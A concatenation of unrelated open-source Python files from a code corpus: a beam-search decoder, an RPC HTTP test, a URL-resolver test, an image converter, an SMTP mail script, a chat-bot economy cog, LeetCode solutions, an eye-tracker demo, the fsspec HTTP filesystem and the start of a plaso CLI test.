exc_group: ExceptionGroup = ExceptionGroup.COMMON,
message: Optional[str] = None,
ddog_tags: Optional[Dict[str, Any]] = None,
severity: ExceptionSeverity = ExceptionSeverity.error,
component: ComponentType = ComponentType.UNKNOWN,
):
"""
Attempt to have one fn logging to stderr, datadog
Let's see how this works for us and we can change later or add it to python lib.
"""
caller_frame = inspect.stack()[1]
called_by = f'File {caller_frame.filename}, line {caller_frame.lineno}, in {caller_frame.function}'
ddog_tags = ddog_tags or dict()
ddog_tags['exception_type'] = type(exc).__name__
ddog_tags['exception_group'] = exc_group.value
ddog_tags['component'] = component.value
ddog_tags['severity'] = severity.value
all_tags = dict()
all_tags.update(ddog_tags)
request_data_str = '<not-set>'
if ExceptionTags.REQUEST_DATA in all_tags:
# Log request data separately, not inside tags, coz it adds one more level of json escaping and is even
# crazier to read
request_data_str = str(all_tags[ExceptionTags.REQUEST_DATA])
del all_tags[ExceptionTags.REQUEST_DATA]
logger.error(
f'Message: {message} Called by: {called_by}. '
f'Exception: {exception_to_string_with_traceback(exc)} Tags: {all_tags} '
f'{request_data_str}'
)
|
the-stack_0_3721 | #Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/
from __future__ import unicode_literals, print_function, division
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
import imp
imp.reload(sys)
import os
import time
import torch
from torch.autograd import Variable
import sys
sys.path.append('/home/kxiao/pointer_generator_pytorch/')
from data_util.batcher import Batcher
from data_util.data import Vocab
from data_util import data, config
from model import Model
from data_util.utils import write_for_rouge, rouge_eval, rouge_log
from train_util import get_input_from_batch
use_cuda = config.use_gpu and torch.cuda.is_available()
class Beam(object):
def __init__(self, tokens, log_probs, state, context, coverage):
self.tokens = tokens
self.log_probs = log_probs
self.state = state
self.context = context
self.coverage = coverage
def extend(self, token, log_prob, state, context, coverage):
return Beam(tokens = self.tokens + [token],
log_probs = self.log_probs + [log_prob],
state = state,
context = context,
coverage = coverage)
@property
def latest_token(self):
return self.tokens[-1]
@property
def avg_log_prob(self):
return sum(self.log_probs) / len(self.tokens)
class BeamSearch(object):
def __init__(self, model_file_path):
model_name = os.path.basename(model_file_path)
self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))
self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')
self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')
for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:
if not os.path.exists(p):
os.mkdir(p)
self.vocab = Vocab(config.vocab_path, config.vocab_size)
self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',
batch_size=config.beam_size, single_pass=True)
time.sleep(15)
self.model = Model(model_file_path, is_eval=True)
def sort_beams(self, beams):
return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)
def decode(self):
start = time.time()
counter = 0
batch = self.batcher.next_batch()
# 新的架构里写在训练的decode部分
while batch is not None:
# Run beam search to get best Hypothesis
best_summary = self.beam_search(batch)
# Extract the output ids from the hypothesis and convert back to words
output_ids = [int(t) for t in best_summary.tokens[1:]]
decoded_words = data.outputids2words(output_ids, self.vocab,
(batch.art_oovs[0] if config.pointer_gen else None))
# Remove the [STOP] token from decoded_words, if necessary
try:
fst_stop_idx = decoded_words.index(data.MARK_EOS)
decoded_words = decoded_words[:fst_stop_idx]
except ValueError:
decoded_words = decoded_words
original_abstract_sents = batch.original_abstracts_sents[0]
original_article = batch.original_articles[0]
# 英文
# write_for_rouge(original_abstract_sents, decoded_words, counter,
# self._rouge_ref_dir, self._rouge_dec_dir)
# 中文
self.write_result(original_article, original_abstract_sents,
decoded_words, counter)
counter += 1
# if counter % 1000 == 0:
# print('%d example in %d sec'%(counter, time.time() - start))
# start = time.time()
batch = self.batcher.next_batch()
# print("Decoder has finished reading dataset for single_pass.")
# print("Now starting ROUGE eval...")
# results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)
# rouge_log(results_dict, self._decode_dir)
def write_result(self, original_title, reference_summarization,
decoded_words, ex_index):
"""
Write output to file.
Args:
reference_sents: list of strings
decoded_words: list of strings
ex_index: int, the index with which to label the files
"""
summarization = ''.join(decoded_words)
# Write to file
result_file = os.path.join(self._decode_dir, "result.txt")
with open(result_file, 'w') as f:
f.write(
original_title + '\t\t' +
reference_summarization + '\t\t' +
summarization + "\n")
print("Wrote example %i to file" % ex_index)
def beam_search(self, batch):
#batch should have only one example
enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \
get_input_from_batch(batch, use_cuda)
encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)
s_t_0 = self.model.reduce_state(encoder_hidden)
dec_h, dec_c = s_t_0 # 1 x 2*hidden_size
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
#decoder batch preparation, it has beam_size example initially everything is repeated
beams = [Beam(tokens=[self.vocab.word2id(data.MARK_GO)],
log_probs=[0.0],
state=(dec_h[0], dec_c[0]),
context = c_t_0[0],
coverage=(coverage_t_0[0] if config.is_coverage else None))
for _ in range(config.beam_size)]
results = []
steps = 0
while steps < config.max_dec_steps and len(results) < config.beam_size:
latest_tokens = [h.latest_token for h in beams]
latest_tokens = [t if t < self.vocab.size() else self.vocab.word2id(data.MARK_UNK) \
for t in latest_tokens]
y_t_1 = Variable(torch.LongTensor(latest_tokens)) # 向量
if use_cuda:
y_t_1 = y_t_1.cuda()
all_state_h =[]
all_state_c = []
all_context = []
for h in beams:
state_h, state_c = h.state
all_state_h.append(state_h)
all_state_c.append(state_c)
all_context.append(h.context)
s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))
c_t_1 = torch.stack(all_context, 0)
coverage_t_1 = None
if config.is_coverage:
all_coverage = []
for h in beams:
all_coverage.append(h.coverage)
coverage_t_1 = torch.stack(all_coverage, 0)
final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,
encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,
extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps)
log_probs = torch.log(final_dist)
topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)
dec_h, dec_c = s_t
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
all_beams = []
num_orig_beams = 1 if steps == 0 else len(beams)
for i in range(num_orig_beams): # 对于不同的句子
h = beams[i]
state_i = (dec_h[i], dec_c[i])
context_i = c_t[i]
coverage_i = (coverage_t[i] if config.is_coverage else None)
for j in range(config.beam_size * 2): # for each of the top 2*beam_size hyps:
new_beam = h.extend(token=topk_ids[i, j].item(),
log_prob=topk_log_probs[i, j].item(),
state=state_i,
context=context_i,
coverage=coverage_i)
all_beams.append(new_beam)
beams = []
for h in self.sort_beams(all_beams):
if h.latest_token == self.vocab.word2id(data.MARK_EOS):
if steps >= config.min_dec_steps:
results.append(h)
else:
beams.append(h)
if len(beams) == config.beam_size or len(results) == config.beam_size:
break
steps += 1
if len(results) == 0:
results = beams
beams_sorted = self.sort_beams(results)
return beams_sorted[0]
if __name__ == '__main__':
model_filename = sys.argv[1]
beam_Search_processor = BeamSearch(model_filename)
beam_Search_processor.decode()
|
the-stack_0_3723 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import KabberryTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (KabberryTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because kabberryd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
the-stack_0_3726 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from util import resolve_url
class TestResolveUrl(unittest.TestCase):
""" run to test:
python -m unittest -v util_test
"""
def testKnown(self):
url = resolve_url('GERRIT:foo.jar', {})
self.assertEqual(url,
'http://gerrit-maven.storage.googleapis.com/foo.jar')
def testKnownRedirect(self):
url = resolve_url('MAVEN_CENTRAL:foo.jar',
{'MAVEN_CENTRAL': 'https://my.company.mirror/maven2'})
self.assertEqual(url, 'https://my.company.mirror/maven2/foo.jar')
def testCustom(self):
url = resolve_url('https://maven.example.com/release/foo.jar', {})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
def testCustomRedirect(self):
url = resolve_url('MAVEN_EXAMPLE:foo.jar',
{'MAVEN_EXAMPLE':
'https://maven.example.com/release'})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3732 | #!/usr/bin/env python3
"""
Read class averages mrc file and save it to jpg.
Automatically remove the edges.
INPUT: mrcs file of 2D class averages
OUTPUT: a dir for the jpg output
The name of the jpg file would be "particlename_diamxxkxx_classnumber.jpg"
"""
import os
import mrcfile
import numpy as np
from PIL import Image
import argparse
import shutil
from . import imgprep
# from .lib import utils
def setupParserOptions():
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input',
help="Input mrcs file of 2D class averages.")
ap.add_argument('-n', '--name', default='particle',
help="Name of the particle")
ap.add_argument('-o', '--output', default='2DAssess',
help="Output jpg dir.")
args = vars(ap.parse_args())
return args
def mrcs2jpg(args):
print('Converting mrcs to jpg....')
os.chdir(os.path.abspath(os.path.dirname(args['input']))) # navigate to the par dir of input file
try:
shutil.rmtree(args['output'])
except OSError:
pass
os.mkdir(args['output'])
os.mkdir(os.path.join(args['output'], 'data'))
avg_mrc = mrcfile.open(os.path.basename(args['input'])).data
if len(avg_mrc.shape) == 3:
num_part = avg_mrc.shape[0]
elif len(avg_mrc.shape) == 2:
num_part = 1
for i in range(num_part):
new_img = avg_mrc[i,:,:]
if np.sum(new_img) > 1e-7 or np.sum(new_img) < -1e-7:
new_img = imgprep.cutByRadius(new_img)
new_img = ((new_img-new_img.min())/((new_img.max()-new_img.min())+1e-7)*255).astype('uint8')
new_img = Image.fromarray(new_img)
new_img = new_img.convert("L")
new_img.save(os.path.join(args['output'], 'data', (args['name'] + '_' + str(i+1) + '.jpg')))
if __name__ == '__main__':
args = setupParserOptions()
mrcs2jpg(args)
|
the-stack_0_3733 | import smtplib
import ast
import getpass
import sys
#ENTER DETAILS BELOW
DEFAULT_RECIPIENT = ''
pwd = ""
def send_mail(mailfile,SUBJECT,recipient = DEFAULT_RECIPIENT):
if recipient == '.':
recipient = DEFAULT_RECIPIENT
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(DEFAULT_RECIPIENT, str(pwd))
if mailfile == '.':
mailfile = "my_mail_auto.txt"
f = open(mailfile,'w')
f.write("Test Mail")
f.close()
f = open(mailfile,'r')
TEXT = f.read()
f.close()
message = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
s.sendmail(DEFAULT_RECIPIENT, recipient, message)
s.quit()
if __name__ == '__main__':
if len(sys.argv)<3:
print("Check number of arguments: py mail_sender.py mailfile(.) subjectstr recepient") #recipient argument is mandatory
sys.exit(-1)
send_mail(sys.argv[1]," ".join(sys.argv[2:-1]),sys.argv[-1])
|
the-stack_0_3737 | import voltage
from voltage.ext import commands
import random
from utils import get_db, check_account, cooldown
# (name, multiplier)
people = [
("Enoki", 1),
("Insert", 1.2),
("NotJan", 0.9),
("Jan", 1),
("Delta", 1.2),
("z3", 0.1),
("atal", 1.5),
("Fatal", 1.2),
]
# (message, (min, max), weight)
scenarios = [
("{name} saw you begging and graciously gave you {amount} SusCoins.", (1, 100), 1),
("WOW, {name} gave you {amount} SusCoins for because they're like very kind and stuff.", (50, 100), 0.8),
]
def setup(client) -> commands.Cog:
economy = commands.Cog("Economy", "Simple economy commands.")
@check_account()
@economy.command(aliases=['bal', 'b'])
async def balance(ctx):
"""Check your balance."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
await ctx.reply(f"Your balance is **__{bal}__** SusCoins.")
# @cooldown("beg", 20)
@check_account()
@economy.command()
async def beg(ctx):
"""Beg for money."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
person = random.choice(people)
scenario = random.choices(scenarios, weights=[x[2] for x in scenarios])[0]
amount = int(random.randint(scenario[1][0], scenario[1][1]) * person[1])
cur.execute("UPDATE economy SET balance = balance + ? WHERE user_id = ?", (amount, ctx.author.id))
conn.commit()
cur.close()
conn.close()
await ctx.reply(scenario[0].format(name=f"**{person[0]}**", amount=f"**__{amount}__**"))
return economy
|
the-stack_0_3738 | # 107. Binary Tree Level Order Traversal II
# [email protected]
# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).
# For example:
# Given binary tree [3,9,20,null,null,15,7],
# 3
# / \
# 9 20
# / \
# 15 7
# return its bottom-up level order traversal as:
# [
# [15,7],
# [9,20],
# [3]
# ]
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrderBottom(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
# sol 1:
# BFS iterative
# runtime: 48ms
if not root:
return []
queue = [root]
res = []
while queue:
vals = [node.val if node else None for node in queue]
res.append(vals)
queue = [leaf for q in queue for leaf in (q.left, q.right) if leaf]
return res[::-1]
# sol 2
# BFS iterative
# runtime: 47ms
if not root:
return []
queue = [(root, 0)]
res = collections.defaultdict(list)
while queue:
node, depth = queue.pop()
res[depth].append(node.val)
if node.right:
queue.append((node.right, depth + 1))
if node.left:
queue.append((node.left, depth + 1))
return res.values()[::-1]
|
the-stack_0_3739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple iohub eye tracker device demo.
Select which tracker to use by setting the TRACKER variable below.
"""
from __future__ import absolute_import, division, print_function
from psychopy import core, visual
from psychopy.iohub import launchHubServer
from psychopy.iohub.util import hideWindow, showWindow
# Eye tracker to use ('mouse', 'eyelink', 'gazepoint', or 'tobii')
TRACKER = 'mouse'
eyetracker_config = dict(name='tracker')
devices_config = {}
if TRACKER == 'mouse':
devices_config['eyetracker.hw.mouse.EyeTracker'] = eyetracker_config
elif TRACKER == 'eyelink':
eyetracker_config['model_name'] = 'EYELINK 1000 DESKTOP'
eyetracker_config['runtime_settings'] = dict(sampling_rate=1000, track_eyes='RIGHT')
devices_config['eyetracker.hw.sr_research.eyelink.EyeTracker'] = eyetracker_config
elif TRACKER == 'gazepoint':
devices_config['eyetracker.hw.gazepoint.gp3.EyeTracker'] = eyetracker_config
elif TRACKER == 'tobii':
devices_config['eyetracker.hw.tobii.EyeTracker'] = eyetracker_config
else:
print("{} is not a valid TRACKER name; please use 'mouse', 'eyelink', 'gazepoint', or 'tobii'.".format(TRACKER))
core.quit()
# Number if 'trials' to run in demo
TRIAL_COUNT = 2
# Maximum trial time / time timeout
T_MAX = 60.0
win = visual.Window((1920, 1080),
units='pix',
fullscr=True,
allowGUI=False,
colorSpace='rgb255',
monitor='55w_60dist',
color=[128, 128, 128]
)
win.setMouseVisible(False)
text_stim = visual.TextStim(win, text="Start of Experiment",
pos=[0, 0], height=24,
color='black', units='pix', colorSpace='named',
wrapWidth=win.size[0] * .9)
text_stim.draw()
win.flip()
io = launchHubServer(window=win, **devices_config)
# Get some iohub devices for future access.
keyboard = io.getDevice('keyboard')
tracker = io.getDevice('tracker')
# Minimize the PsychoPy window if needed
hideWindow(win)
# Display calibration gfx window and run calibration.
result = tracker.runSetupProcedure()
print("Calibration returned: ", result)
# Maximize the PsychoPy window if needed
showWindow(win)
gaze_ok_region = visual.Circle(win, lineColor='black', radius=300, units='pix', colorSpace='named')
gaze_dot = visual.GratingStim(win, tex=None, mask='gauss', pos=(0, 0),
size=(40, 40), color='green', colorSpace='named', units='pix')
text_stim_str = 'Eye Position: %.2f, %.2f. In Region: %s\n'
text_stim_str += 'Press space key to start next trial.'
missing_gpos_str = 'Eye Position: MISSING. In Region: No\n'
missing_gpos_str += 'Press space key to start next trial.'
text_stim.setText(text_stim_str)
# Run Trials.....
t = 0
while t < TRIAL_COUNT:
io.clearEvents()
tracker.setRecordingState(True)
run_trial = True
tstart_time = core.getTime()
while run_trial is True:
# Get the latest gaze position in display coord space.
gpos = tracker.getLastGazePosition()
# Update stim based on gaze position
valid_gaze_pos = isinstance(gpos, (tuple, list))
gaze_in_region = valid_gaze_pos and gaze_ok_region.contains(gpos)
if valid_gaze_pos:
# If we have a gaze position from the tracker, update gc stim and text stim.
if gaze_in_region:
gaze_in_region = 'Yes'
else:
gaze_in_region = 'No'
text_stim.text = text_stim_str % (gpos[0], gpos[1], gaze_in_region)
gaze_dot.setPos(gpos)
else:
# Otherwise just update text stim
text_stim.text = missing_gpos_str
# Redraw stim
gaze_ok_region.draw()
text_stim.draw()
if valid_gaze_pos:
gaze_dot.draw()
# Display updated stim on screen.
flip_time = win.flip()
# Check any new keyboard char events for a space key.
# If one is found, set the trial end variable.
#
if keyboard.getPresses(keys=' '):
run_trial = False
elif core.getTime()-tstart_time > T_MAX:
run_trial = False
win.flip()
# Current Trial is Done
# Stop eye data recording
tracker.setRecordingState(False)
t += 1
# All Trials are done
# End experiment
win.close()
tracker.setConnectionState(False)
io.quit()
core.quit()
|
the-stack_0_3740 | class Solution:
def XXX(self, nums: List[int]) -> List[List[int]]:
flag = [0 for i in nums]
res = [[]]
for i in nums:
tem = deepcopy(res)
for j in range(len(tem)):
tem[j].append(i)
res.extend(tem)
return res
|
the-stack_0_3741 | from __future__ import print_function, division, absolute_import
import re
import requests
from fsspec import AbstractFileSystem
from fsspec.utils import tokenize, DEFAULT_BLOCK_SIZE
# https://stackoverflow.com/a/15926317/3821154
ex = re.compile(r"""<a\s+(?:[^>]*?\s+)?href=(["'])(.*?)\1""")
ex2 = re.compile(r"""(http[s]?://[-a-zA-Z0-9@:%_+.~#?&/=]+)""")
class HTTPFileSystem(AbstractFileSystem):
"""
Simple File-System for fetching data via HTTP(S)
``ls()`` is implemented by loading the parent page and doing a regex
match on the result. If simple_link=True, anything of the form
"http(s)://server.com/stuff?thing=other"; otherwise only links within
HTML href tags will be used.
"""
sep = '/'
def __init__(self, **storage_options):
"""
Parameters
----------
block_size: int
Blocks to read bytes; if 0, will default to raw requests file-like
objects instead of HTTPFile instances
simple_links: bool
If True, will consider both HTML <a> tags and anything that looks
like a URL; if False, will consider only the former.
storage_options: key-value
May be credentials, e.g., `{'auth': ('username', 'pword')}` or any
other parameters passed on to requests
"""
AbstractFileSystem.__init__(self)
self.block_size = storage_options.pop('block_size', DEFAULT_BLOCK_SIZE)
self.simple_links = storage_options.pop('simple_links', True)
self.kwargs = storage_options
self.session = requests.Session()
def _strip_protocol(self, path):
""" For HTTP, we always want to keep the full URL
"""
return path
def ls(self, url, detail=True):
# ignoring URL-encoded arguments
r = requests.get(url, **self.kwargs)
if self.simple_links:
links = ex2.findall(r.text) + ex.findall(r.text)
else:
links = ex.findall(r.text)
out = set()
for l in links:
if isinstance(l, tuple):
l = l[1]
if l.startswith('http'):
if l.replace('https', 'http').startswith(
url.replace('https', 'http')):
out.add(l)
else:
if l not in ['..', '../']:
# Ignore FTP-like "parent"
out.add('/'.join([url.rstrip('/'), l.lstrip('/')]))
if detail:
return [{'name': u, 'type': 'directory'
if u.endswith('/') else 'file'} for u in out]
else:
return list(sorted(out))
def cat(self, url):
r = requests.get(url, **self.kwargs)
r.raise_for_status()
return r.content
def mkdirs(self, url):
"""Make any intermediate directories to make path writable"""
raise NotImplementedError
def _open(self, url, mode='rb', block_size=None, **kwargs):
"""Make a file-like object
Parameters
----------
url: str
Full URL with protocol
mode: string
must be "rb"
block_size: int or None
Bytes to download in one request; use instance value if None.
kwargs: key-value
Any other parameters, passed to requests calls
"""
if mode != 'rb':
raise NotImplementedError
block_size = block_size if block_size is not None else self.block_size
kw = self.kwargs.copy()
kw.update(kwargs)
kw.pop('autocommit', None)
if block_size:
return HTTPFile(url, self.session, block_size, **kw)
else:
kw['stream'] = True
r = self.session.get(url, **kw)
r.raise_for_status()
r.raw.decode_content = True
return r.raw
def ukey(self, url):
"""Unique identifier; assume HTTP files are static, unchanging"""
return tokenize(url, self.kwargs, self.protocol)
def size(self, url):
"""Size in bytes of the file at path"""
return file_size(url, session=self.session, **self.kwargs)
class HTTPFile(object):
"""
A file-like object pointing to a remove HTTP(S) resource
Supports only reading, with read-ahead of a predermined block-size.
In the case that the server does not supply the filesize, only reading of
the complete file in one go is supported.
Parameters
----------
url: str
Full URL of the remote resource, including the protocol
session: requests.Session or None
All calls will be made within this session, to avoid restarting
connections where the server allows this
block_size: int or None
The amount of read-ahead to do, in bytes. Default is 5MB, or the value
configured for the FileSystem creating this file
kwargs: all other key-values are passed to reqeuests calls.
"""
def __init__(self, url, session=None, block_size=None, **kwargs):
self.url = url
self.kwargs = kwargs
self.loc = 0
self.session = session if session is not None else requests.Session()
self.blocksize = (block_size if block_size is not None
else DEFAULT_BLOCK_SIZE)
try:
self.size = file_size(url, self.session, allow_redirects=True,
**self.kwargs)
except (ValueError, requests.HTTPError):
# No size information - only allow read() and no seek()
self.size = None
self.cache = None
self.closed = False
self.start = None
self.end = None
def seek(self, where, whence=0):
"""Set file position
Parameters
----------
where: int
Location to set
whence: int (default 0)
If zero, set from start of file (value should be positive); if 1,
set relative to current position; if 2, set relative to end of file
(value shoulf be negative)
Returns the position.
"""
if self.size is None and (where, whence) not in [(0, 0), (0, 1)]:
raise ValueError('Cannot seek since size of file is not known')
if whence == 0:
nloc = where
elif whence == 1:
nloc = self.loc + where
elif whence == 2:
nloc = self.size + where
else:
raise ValueError('Whence must be in [1, 2, 3], but got %s' % whence)
if nloc < 0:
raise ValueError('Seek before start of file')
self.loc = nloc
return nloc
def tell(self):
"""Get current file byte position"""
return self.loc
def read(self, length=-1):
"""Read bytes from file
Parameters
----------
length: int
Read up to this many bytes. If negative, read all content to end of
file. If the server has not supplied the filesize, attempting to
read only part of the data will raise a ValueError.
"""
if length == 0:
# asked for no data, so supply no data and shortcut doing work
return b''
if self.size is None:
if length >= 0:
# asked for specific amount of data, but we don't know how
# much is available
raise ValueError('File size is unknown, must read all data')
else:
# asked for whole file
return self._fetch_all()
if length < 0 and self.loc == 0:
# size was provided, but asked for whole file, so shortcut
return self._fetch_all()
if length < 0 or self.loc + length > self.size:
end = self.size
else:
end = self.loc + length
if self.loc >= self.size:
# EOF (python files don't error, just return no data)
return b''
self. _fetch(self.loc, end)
data = self.cache[self.loc - self.start:end - self.start]
self.loc = end
return data
def _fetch(self, start, end):
"""Set new bounds for data cache and fetch data, if required"""
if self.start is None and self.end is None:
# First read
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(start, self.end)
elif start < self.start:
if self.end - end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(start, self.start)
self.start = start
self.cache = new + self.cache
elif end > self.end:
if self.end > self.size:
return
if end - self.end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(self.end, end + self.blocksize)
self.end = end + self.blocksize
self.cache = self.cache + new
def _fetch_all(self):
"""Read whole file in one shot, without caching
This is only called when size is None or position is still at zero,
and read() is called without a byte-count.
"""
r = self.session.get(self.url, **self.kwargs)
r.raise_for_status()
out = r.content
# set position to end of data; actually expect file might close shortly
l = len(out)
if l < self.blocksize:
# actually all data fits in one block, so cache
self.start = 0
self.end = l
self.cache = out
self.size = l
self.loc = len(out)
return out
def _fetch_range(self, start, end):
"""Download a block of data
The expectation is that the server returns only the requested bytes,
with HTTP code 206. If this is not the case, we first check the headers,
and then stream the output - if the data size is bigger than we
requested, an exception is raised.
"""
kwargs = self.kwargs.copy()
headers = self.kwargs.pop('headers', {})
headers['Range'] = 'bytes=%i-%i' % (start, end - 1)
r = self.session.get(self.url, headers=headers, stream=True, **kwargs)
r.raise_for_status()
if r.status_code == 206:
# partial content, as expected
return r.content
if 'Content-Length' in r.headers:
cl = int(r.headers['Content-Length'])
if cl <= end - start:
# data size OK
return r.content
else:
raise ValueError('Got more bytes (%i) than requested (%i)' % (
cl, end - start))
cl = 0
out = []
for chunk in r.iter_content(chunk_size=2 ** 20):
# data size unknown, let's see if it goes too big
if chunk:
out.append(chunk)
cl += len(chunk)
if cl > end - start:
raise ValueError(
'Got more bytes so far (>%i) than requested (%i)' % (
cl, end - start))
else:
break
return b''.join(out)
def __enter__(self):
self.loc = 0
return self
def __exit__(self, *args):
self.close()
def __iter__(self):
# no text lines here, use TextIOWrapper
raise NotImplementedError
def write(self):
raise NotImplementedError
def flush(self):
pass
def close(self):
self.closed = True
def seekable(self):
return True
def writable(self):
return False
def readable(self):
return True
def file_size(url, session, **kwargs):
"""Call HEAD on the server to get file size
Default operation is to explicitly allow redirects and use encoding
'identity' (no compression) to get the true size of the target.
"""
kwargs = kwargs.copy()
ar = kwargs.pop('allow_redirects', True)
head = kwargs.get('headers', {})
if 'Accept-Encoding' not in head:
head['Accept-Encoding'] = 'identity'
r = session.head(url, allow_redirects=ar, **kwargs)
r.raise_for_status()
if 'Content-Length' in r.headers:
return int(r.headers['Content-Length'])
else:
raise ValueError("Server did not supply size of %s" % url)
|
the-stack_0_3742 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the profiling CLI arguments helper."""
from __future__ import unicode_literals
import argparse
import unittest
from plaso.cli import tools
from plaso.cli.helpers import profiling
from plaso.lib import errors
from tests import test_lib as shared_test_lib
from tests.cli import test_lib as cli_test_lib
class ProfilingArgumentsHelperTest(cli_test_lib.CLIToolTestCase):
"""Tests for the profiling CLI arguments helper."""
# pylint: disable=protected-access
_EXPECTED_OUTPUT = """\
usage: cli_helper.py [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY]
[--profiling_sample_rate SAMPLE_RATE]
Test argument parser.
optional arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma
separated list where each entry is the name of a
profiler. Use "--profilers list" to list the available
profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the
profiling sample files. By default the sample files
